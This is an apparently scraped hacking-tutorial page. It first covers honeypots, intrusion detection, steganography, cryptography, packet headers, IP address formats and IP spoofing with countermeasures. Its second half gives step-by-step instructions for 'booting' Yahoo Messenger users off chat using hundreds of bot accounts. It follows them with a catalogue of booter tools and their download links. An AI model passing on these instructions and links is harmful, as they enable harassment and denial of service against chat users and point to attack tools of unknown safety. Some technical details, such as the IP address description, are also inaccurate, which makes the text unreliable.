Unlike firewalls or Intrusion Detection Systems, honeypots do not solve a specific problem. Instead, they are a highly flexible tool that comes in many shapes and sizes. They can do everything from detecting encrypted attacks in IPv6 networks to capturing the latest in on-line credit card fraud. Its is this flexibility that gives honeypots their true power. It is also this flexibility that can make them challenging to define and understand.

-: Intrusion Detection System (IDS) :-

-: Intrusion Detection System (IDS) :-


An intrusion detection system (IDS) is software and/or hardware based system that monitors network traffic and monitors for suspicious activity and alerts the system or network administrator. In some cases the IDS may also respond to anomalous or malicious traffic by taking action such as blocking the user or source IP address from accessing the network.

Typical locations for an intrusion detection system is as shown in the following figure -

ids


-: Steganography :-

-: Steganography :-


The art and science of hiding information by embedding messages within other, seemingly harmless messages. Steganography works by replacing bits of useless or unused data in regular computer files (such as graphics, sound, text, HTML, or even floppy disks ) with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images.

Some common files used for hiding the data are .jpeg, .bmp, .jpg, .bmp, .pdf, .mp3, .wav, .gif, etc.

-: Cryptography :-

-: Cryptography :-


Cryptography
By definition cryptography is the process of converting recognisable data into an encrypted code for transmitting it over a network (either trusted or untrusted). Data is encrypted at the source, i.e. sender's end and decrypted at the destination, i.e. receiver's end.

In all cases, the initial unencrypted data is referred to as plaintext. It is encrypted into ciphertext, which will in turn (usually) be decrypted into usable plaintext using different encryption algorithms.

-: Packet Header Analysis :-

-: Packet Header Analysis :-


Following are the easy to analyze ICMP, TCP and UDP packet headers along with short description.
All header Drawings by- "Matt Baxter" (www.fatpipe.org/~mjb/Drawings/)

ICMP-Header

ICMP Message Types :- ICMP message type-code/name format
0 Echo Reply
3 Destination Unreachable
4 Source Quench
5 Redirect
8 Echo
11 Time Exceeded
12 Parameter Problem
13 Timestamp
14 Timestamp Reply
15 Information Request
16 Information Reply

Checksum :- The checksum is the 16-bit ones's complement of the one's complement sum of the ICMP message starting with the ICMP Type.

RFC 792 :- Please refer to RFC 792 for Internet Control Message Protocol (ICMP) Specification.


TCP-Header

TCP Flags :- C E U A P R S F
C 0x80 Reduced (CWR)
E 0x40 ECN Echo (ECE)
U 0x20 Urgent
A 0x10 Ack
P 0x08 Push
R 0x04 Reset
S 0x02 Syn
F 0x01 Fin
 
TCP Options :-
0 End of Options List
1 No Operation (NOP, Pad)
2 Maximum Segment Size
3 Window Scale
4 Selective ACK ok
8 Timestamp
 
 
 

Checksum :- Checksum of entire TCP segment and pseudo header (parts of IP header)

Offset :- Number of 32-bit words in TCP header, minimum value of 5. Multiply by 4 to get byte count.

RFC 793 :- Please refer to RFC 793 for Transmission Control Protocol (TCP) Specification.


UDP-Header

Source Port :- an optional field, when meaningful, it indicates the port of the sending process, and may be assumed to be the port to which a reply should be addressed in the absence of any other information. If not used, a value of zero is inserted.

Destination Port :- Destination Port has a meaning within the context of a particular internet destination address.

Length :- Length is the length in octets of this user datagram including this header and the data. (This means the minimum value of the length is eight.)

Checksum :- Checksum is the 16-bit one's complement of the one's complement sum of a pseudo header of information from the IP header, the UDP header, and the data, padded with zero octets at the end (if necessary) to make a multiple of two octets.

RFC 768 :- Please refer to RFC 768 for User Datagram Protocol (UDP) Specification.

-: IP Address :-

-: IP Address :-


Definition :-
"An Internet Protocol (IP) address is a numerical identification (logical address) that is assigned to devices participating in a computer network utilizing the Internet Protocol for communication between its nodes".   -- Wikipedia

The Internet Protocol (IP) has two versions currently in use which are IPv4 and IPv6.
This article represents to IPv4 version only.

In general, an IP address is a 32-bit decimal number that is normally written as four numbers between 1 to 255 (8 bits or 1 byte each), each seperated from the other by a decimal point. This standard is known as "Dotted Decimal Notation".
e.g.-   117.200.77.110

IP addresses are divided into number of ranges/classes as given in the table below-

Class Range
A 0.0.0.0 to 127.255.255.255
B128.0.0.0 to 191.255.255.255
C192.0.0.0 to 223.255.255.255
D224.0.0.0 to 239.255.255.255
E240.0.0.0 to 255.255.255.255

e.g.-  IP Address 192.168.24.114 belongs to Class 'C'.

How to find out IP Address of your system ?
1) Connect to the Internet.
2) Launch MS-DOS Command Prompt.
3) Type "netstat -n", Press Enter.

You will get the output similar to following-


The IP Address shown in local address field denotes IP Address of your system.
In this case it is 117.200.160.151

IP Address Formats :-
Four different formats of IP Address along with example is as given below-

1) Domain Name System (DNS) : www.insecure.in
2) DWORD Format : 2928008962
3) Octal Format : 0256.0205.0337.002
4) Dotted Decimal Format : 174.133.223.2

Converting DNS IP Address into Normal IP Address :-
You can easily get the IP Address of any domain by various methods such as WHOIS, Netstat, Ping, Traceroute, etc.
Here I have used 'Ping' to get IP Address.

1) Connect to the Internet.
2) Launch MS-DOS Command Prompt.
3) Type "ping domainname", Press Enter.

You will get the output similar to following-



Here, IP Address for Domain "www.insecure.in" is "174.133.223.2"

Thus by typing "http://www.insecure.in" OR "http://2928008962" OR "0256.0205.0337.02" OR "174.133.223.2" in your browser will take you to the same site.

Not all of these formats work in all browsers.

-: IP Spoofing :-

-: IP Spoofing :-


The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.

Why it works ?
IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is security weakness in the TCP protocol known as sequence number prediction.

How it works ?
To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.

Internet Protocol (IP) :
It is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.
Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contains the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses – specifically the “source address” field.

Transmission Control Protocol (TCP) :
It is the connection-oriented, reliable transport protocol in the TCP/IP suite. Connection-oriented simply means that the two hosts participating in a discussion must first establish a connection via the 3-way handshake (SYN-SYN/ACK-ACK). Reliability is provided by data sequencing and acknowledgement. TCP assigns sequence numbers to every segment and acknowledges any and all data segments recieved from the other end.

As you can see above, the first 12 bytes of the TCP packet, which contain port and sequencing information.

TCP sequence numbers can simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header will contain the sequence number of the *first* byte of data in the TCP segment. The acknowledgement number field in the TCP header holds the value of next *expected* sequence number, and also acknowledges *all* data up through this ACK number minus one.

TCP packets can be manipulated using several packet crafting softwares available on the internet.

The Attack
IP-spoofing consists of several steps. First, the target host is choosen. Next, a pattern of trust is discovered, along with a trusted host. The trusted host is then disabled, and the target's TCP sequence numbers are sampled. The trusted host is impersonated, the sequence numbers guessed, and a connection attempt is made to a service that only requires address-based authentication. If successful, the attacker executes a simple command to leave a backdoor.

Spoofing can be implemented by different ways as given below -

Non-Blind Spoofing :- This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the potential difficulty of calculating them accurately.

Blind Spoofing :- Here the sequence and acknowledgement numbers are unreachable. In order to circumvent this, several packets are sent to the target machine in order to sample sequence numbers.

Both types of spoofing are forms of a common security violation known as a Man In The Middle Attack. In these attacks, a malicious party intercepts a legitimate communication between two friendly parties. The malicious host then controls the flow of communication and can eliminate or alter the information sent by one of the original participants without the knowledge of either the original sender or the recipient. In this way, an attacker can fool a victim into disclosing confidential information by “spoofing” the identity of the original sender, who is presumably trusted by the recipient.

IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against – Denial of Service attacks, or DoS.
CounterMeasures
1) Filtering at the Router :- Implementing ingress and egress filtering on your border routers is a great place to start your spoofing defense. You will need to implement an ACL (access control list)

2) Encryption and Authentication :- Implementing encryption and authentication will also reduce spoofing threats. Both of these features are included in Ipv6, which will eliminate current spoofing threats.

3) Initial Sequence Number Randomizing.

Yahoo Booters

How Yahoo Booter Works ?

Yahoo messenger can get into yahoo chat, but in reality, it’s a seperate service…
Yahoo Messenger’s server has a Buffer, this buffer is actually 128k not the 512k.
When the attacker sends multiple packets to you, what you don’t get from the server gets stored in a buffer, in comes a chat packet, the client grabs it, in comes 5 chat packets, you grab the first 3 packets, 2 are left behind on yahoo’s server, you then grab the 2 packets and then the buffer is back to empty.
Actually the booter sends 1k’s worth in 1 packet of PM (instant messaging packets) but instead of sending the 1 packet, the booter builds up 10 pm/im packets.
Then you send it to yahoo 10 loops packets of PMs @ 1k each = 80k in 1 load to yahoo then the booter sends it again, 160k.
Now if you can send 128k’s worth of data, pm packets, chat packets, anything you like to the other user BEFORE the user can get the data out, yahoo will simply disconnect them over 128k why?
Most Probably because the server is instructed to disconnect idle users or users who are no longer online, what’s the point of Keeping someone in yahoo chat if they are not getting the data people are sending them, after 40 minutes of a client sending data yahoo goes, we’ve buffered 128k, the user aint there, kick him…!
In Short, Yahoo Messenger Would Crash if it got anything more than 128k.
Also the connection protocols YMSG and Chat2 which is also a factor. YChat was harder to boot for the simple fact that it lacked in features compared to YMSG.
This is also why YMSG is easier to boot then Chat2. The more features the more ways you can be booted.
Yes there are ways to prevent from being booted…..!

How to Boot Yahoo Messenger ?
1] You need bots ID (100 to 1000 might be enough). Therefore you need to create ID bots using Manual way just like you create Yahoo Id or use Yahoo Messenger ID Creator aka ID Maker. usually, the bots ID stored in notepad aka txt file with a format ID and password like this:
BotIDd:Password
BotID2:Password
BotID3:Passowrd
etc.. (upto 1000-10000 id bots)
2] You need Yahoo Boot Software that work properly.
3] Load you BotID in Yahoo Boot Software by selecting stored BotID in txt file and load in Yahoo Boot Program.
4] Select the Type of your Boot Option
5] Select / Type Target aka Victim Username or Yahoo ID
6] Final steps. Boot him! Done.


Black Hole By ReMi

Black Hole
Name : Black-Hole
Coder : -= ReMi =-
Nice One boot booter
Can crush messy & Clients
Next Version Coming Soon
Download :
http://www.2shared.com/file/4782142/d37b66d9/-Black-Hole-_By_-ReMi-.html
http://rapidshare.com/files/193003810/-Black-Hole-_By_-ReMi-.zip
http://www.filefactory.com/file/a04gc0e
http://uploaded.to/?id=owd4dn

Terror Begin

terror-begin
6 YM Option
6 Client Option
1 yahelite Lagger Option
Download :
http://www.2shared.com/file/4227318/60fed6cc/T-Begin1.html
http://rapidshare.com/files/161202363/T-Begin1.zip.html
http://www.4shared.com/file/70005998/bc2973aa/T-Begin1.html
 
Evil-DisConnect-V1.0 Update V2.0
Evil Disconnect
Download :
http://www.2shared.com/file/3642119/f2d54b3e/Evil_Disconnect_v10_Fixed.html


Dead Room By Satma

Dead Room
Multi login booter up to 200 , With delay features , For each boot option on this booter has been tested randomly and it works , Anything else the pic says it all.
Download :
http://www.2shared.com/file/4250678/1f985708/Dead_Room_By_Satma.html
http://rapidshare.com/files/162134901/Dead_Room_By_Satma.rar

EX Silent DC V9.0

EX Silent DC
This will auto refresh your bot after every boot.
You should be able to get anywhere from 5-15 effective dc’s before it stops working.
When it does, just use another bot. You can boot a single person as much as you want as long as you rotate bots.
Will auto save your bot id, bot password, and victim id on exit.
Download :
http://rapidshare.com/files/137368430/EX_Silent_DC.zip.html
http://www.2shared.com/file/3763973/4369b3be/EX_Silent_DC.html
http://www.zshare.net/download/1704930081c2a7f4/

Exploited Y!Messenger Silent Dc V 3.0 By Satma

Silent DC
Download :
http://www.snapdrive.net/qs/01663f5f269c
http://sharebee.com/934f338b
http://w15.easy-share.com/1701762988.html

Yah-Mart Special

YAH-MART SPECIAL: YMCS-CLIENT LAGG :twist:
Yah Mart
Download :
http://yourupload.com/files/get/7sHY3UwxSo/ymcs-client-lagg.rar
http://rapidshare.com/files/153908334/YMCS-CLIENT-LAGG.rar.html
http://www.2shared.com/file/4092441/6cdcec80/YMCS-CLIENT-LAGG.html

Dark Booter v3

Dark Booter v3 coded by mohammad
Dark Booter
Download :
http://www.2shared.com/file/4186062/b9b41a26/Dark_Booter_V3.html
http://yourupload.com/files/get/zovYrLVrlA
http://www.sendspace.com/file/tte0sp
http://www.snapdrive.net/qs/db94df85d90e
http://rapidshare.com/files/158973020/Dark_Booter_V3.rar.html


Filthy Assassin v1.2

Filthy Assassin
New updated faster hitting Packets, still up to 500 bot login.
Before it hit pretty fast now it hits REALLY fast…….!
Download :
http://www.snapdrive.net/qs/a353d325f8b7
http://www.keepmyfile.com/download/cf70392345710
http://rapidshare.com/files/153823190/Filthy_Assassin_v_1.2.rar.html